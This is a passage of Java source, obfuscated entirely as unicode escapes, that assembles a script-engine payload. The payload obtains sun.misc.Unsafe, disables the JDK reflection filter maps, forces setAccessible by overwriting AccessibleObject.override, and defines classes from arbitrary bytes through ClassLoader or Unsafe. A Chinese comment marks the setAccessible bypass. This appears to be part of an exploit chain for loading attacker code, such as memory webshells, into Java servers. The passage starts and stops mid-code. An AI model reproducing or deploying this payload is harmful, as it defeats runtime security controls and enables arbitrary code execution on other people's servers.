061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0043\u006c\u0061\u0073\u0073\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0064\u006b\u002e\u0069\u006e\u0074\u0065\u0072\u006e\u0061\u006c\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u002c\u0020\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u0042\u006f\u006f\u006c\u0065\u0061\u006e\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u002c\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0079\u0074\u0065\u0073\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u005c\u0022\u002e\u005c\u0022\u0029\u005b\u0030\u005d\u0020\u003e\u003d\u0020\u0031\u0031\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u005c\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u005b\u0042\u005c\u0022\u0029\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u7ed5\u8fc7\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0065\u006c\u0073\u0065\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0050\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u006f\u0064\u0065\u0053\u006f\u0075\u0072\u0063\u0065\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0063\u0065\u0072\u0074\u002e\u0043\u0065\u0072\u0074\u0069\u0066\u0069\u0063\u0061\u0074\u0065\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u002c\u0020\u006e\u0075\u006c\u006c\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u005b\u005d\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u0